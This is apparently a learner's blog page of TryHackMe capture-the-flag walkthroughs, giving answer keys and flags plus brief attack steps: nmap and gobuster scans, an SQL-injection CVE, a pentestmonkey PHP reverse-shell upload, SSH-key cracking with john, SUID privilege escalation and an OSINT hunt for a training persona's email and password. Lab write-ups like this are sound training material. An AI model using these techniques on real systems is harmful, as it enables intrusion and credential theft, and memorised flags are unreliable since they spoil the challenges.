Imran2024

 1. How many services are running under port 1000? Ans: 2 2. What is running on the higher port? Ans: ssh 3. What's the CVE you're using against the application?  Ans: CVE-2019-9053  4. To what kind of vulnerability is the application vulnerable? Ans: sqli 5. What's the password? Ans: secret 6. Where can you login with the details obtained? Ans: ssh 7. What's the user flag? Ans: G00d j0b, keep up! 8. Is there any other user in the home directory? What's its name? Ans: sunbath 9. What can you leverage to spawn a privileged shell? Ans: vim 10. What's the root flag? Ans: W3ll d0n3. You made it! ==================Problem Solving Step =========== 1. First of all openvpn 2. Scan with nmap cmd: nmap -A ip address cmd: ftp ip address cmd: anonymous cmd: ls cmd: cd pub cmd: ls cmd: mget * then: y cmd: bye cmd: less ForMitch.txt cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt get directory "simple" 3. Go to browser...

 1. Scan the machine, how many ports are open?  Ans: 2 2. What version of Apache is running?  Ans: 2.4.29 3. What service is running on port 22? Ans: ssh 4. What is the hidden directory? Ans: /panel/  5. user.txt  Ans:  THM{y0u_g0t_a_sh3ll} 6. Search for files with SUID permission, which file is weird?  Ans: /usr/bin/python 7. root.txt Ans:  THM{pr1v1l3g3_3sc4l4t10n}   ============   1. Start openvpn and ip address run with browser 2. Scan cmd: nmap -sV -Sc  Ip Address get port and Apache version  cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt get hidden directory list 3. Go to google and search "php shell pentestmonkey" and download "php-reverse-shell.php" this file then change file extension like "php-reverse-shell.php5" 4. Open "php-reverse-shell.p...

 1. Hack the machine and get the flag in user.txt Ans: thm{65c1aaf000506e56996822c6281e6bf7} 2.  Escalate your privileges and get the flag in root.txt Ans: thm{7f336f8c359dbac18d54fdd64ea753bb} ============= Solving way ============= 1. First of all Start Machine and copy id address to past on browser 2. open terminal and run cmd: nmap -A -sS -sV -T4 ip address for open port and etc 3. Go to browser with ip address visit site and see source code cmd: gobuster dir -u http://ip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  For directory info like "admin,img" 4.  Go to ip/admin page and try login then "inspect" and see view page source Add Cookie "SessionToken" => "empty" 5. Relod browser and get hash key cmd: nano id_rsa cmd: ls cmd: chmod 600 id_rsa cmd: ssh2john id_rsa > hash.txt  cmd: john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt Get password: james13 cmd: ssh -i id_rsa james@ip For login need Input- ...

 1. What is this users avatar of? Ans: cat 2. What city is this person in? Ans: London 3. Whats the SSID of the WAP he connected to? Ans: UnileverWiFi 4. What is his personal email address? Ans: OWoodflint@gmail.com 5. What site did you find his email address on? Ans: Github 6. Where has he gone on holiday? Ans: New York 7. What is this persons password? Ans: pennYDr0pper.! ============= Solving way ============ 1. First of all go to tryhackme from download jpg file then open terminal and write   cmd: exiftool  file_name.jpg 2. Get user name then search google  3. You will see some website link then open github, twitter and website  4. Twitter to get user's "name" and SSID 5. Github to get location, email. 6. website to get " Where has he gone on holiday?" address and Password (View Source) 7. Go to "wigle . net" and past ssid to get WAP he connected to "Name"

Step 1st : Create file: cmd(terminal): nano "file name" hit ENTER Step 2nd : Write your code in any language.  Step 3rd : Press CTRL + o to save the file, type the file name, and hit ENTER Step 4th: To exit nano, all you need to do is to press CTRL + X

   1. What is the name of the hidden directory on the web server(enter name without /)? Ans: development 2. What is the username?  Ans: jan 3. What is the password?  Ans:  armando 4. What service do you use to access the server(answer in abbreviation in all caps)? Ans: ssh   5. What is the name of the other user you found(all lower case)?  Ans: kay  6. What is the final password you obtain?  Ans: heresareallystrongpasswordthatfollowsthepasswordpolicy$$ =========================== 1st Start – Machine Run and openvpn Run Command (in dir): sudo openvpn file.ovpn 2nd → Run ip address with in browser go to view source code 3rd → use cmd to run Command: nmap -sC -sV -oN initial IP Address For find out open port scanning like “22,80,145” 4th → Command: gobuster dir --url http://Ip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 5th → copy ip/dir to open with browser 6th → cmd: enum4linux -a ip address for find out user name...